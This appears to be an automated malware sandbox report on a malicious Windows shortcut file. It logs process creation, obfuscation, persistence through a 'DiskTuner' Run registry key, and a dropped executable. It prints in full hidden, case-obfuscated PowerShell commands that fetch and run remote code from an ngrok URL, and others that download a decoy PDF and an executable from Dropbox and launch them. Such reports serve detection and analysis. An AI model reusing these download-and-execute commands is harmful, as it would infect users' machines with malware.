                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: taCCGTk8n1.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: wkernel32.pdb source: 1718218388.exe, 0000001C.00000003.2719286555.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719389074.0000000003070000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2723943558.0000000003220000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2724115400.0000000004F30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: 1718218388.exe, 0000001C.00000003.2719902686.0000000003170000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719658263.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2725119697.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2724535422.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 1718218388.exe, 0000001C.00000003.2718199192.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2718494359.0000000003140000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2722250208.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 1718218388.exe, 0000001C.00000003.2718838717.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719033779.00000000030F0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: 1718218388.exe, 0000001C.00000003.2718199192.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2718494359.0000000003140000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2722250208.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: 1718218388.exe, 0000001C.00000003.2718838717.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719033779.00000000030F0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 1718218388.exe, 0000001C.00000003.2719286555.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719389074.0000000003070000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2723943558.0000000003220000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2724115400.0000000004F30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 1718218388.exe, 0000001C.00000003.2719902686.0000000003170000.00000004.00000001.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2719658263.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2725119697.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2724535422.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      PowerShell case anomaly found
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)Jump to behavior
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,27_2_004D7960
                      Source: 1718218388.exe.16.drStatic PE information: real checksum: 0x241059 should be: 0x2b1ae9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348942E0 pushad ; ret 3_2_00007FFD348942FD
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004CA770 push eax; ret 27_2_004CA784
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004CA770 push eax; ret 27_2_004CA7AC
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007AB86D push ebx; ret 28_3_007AB864
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007AA840 push ebp; retf 28_3_007AA841
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007AE83C pushad ; ret 28_3_007AE841
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007AE80E push eax; iretd 28_3_007AE81D
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007AA0F9 push FFFFFF82h; iretd 28_3_007AA0FB
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007AD8A0 push 0000002Eh; iretd 28_3_007AD8A2
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007A8904 push ecx; ret 28_3_007A8917
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007AB1DD push eax; ret 28_3_007AB1DF
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007AE586 pushad ; retf 28_3_007AE599
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007A9F6A push eax; ret 28_3_007A9F75
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007AB70B push ebx; ret 28_3_007AB864
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_004381E0 push ecx; retf 28_2_004382AC
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_004381A0 push ecx; retf 28_2_004382AC
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_004CA770 push eax; ret 28_2_004CA784
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_004CA770 push eax; ret 28_2_004CA7AC
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_00434C60 push edi; retf 28_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_00434CF0 push edi; retf 28_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_00434C90 push edi; retf 28_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_00434CB0 push edi; retf 28_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_00447D60 push ecx; retf 28_2_00447E0D
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_2_00436DB0 push ecx; retf 28_2_00436EEF
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 29_3_02AA58BC pushad ; ret 29_3_02AA58C1
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 29_3_02AA588E push eax; iretd 29_3_02AA589D
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 29_3_02AA28ED push ebx; ret 29_3_02AA28E4
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 29_3_02AA18C0 push ebp; retf 29_3_02AA18C1
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 29_3_02AA5606 pushad ; retf 29_3_02AA5619
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 29_3_02AA6012 push 00000038h; iretd 29_3_02AA601D
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 29_3_02AA225D push eax; ret 29_3_02AA225F

                      Persistence and Installation Behavior

                      barindex
                      Windows shortcut file (LNK) starts blacklisted processes
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\1718218388.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeFile created: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiskTuner
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiskTuner

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,27_2_004D7960
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
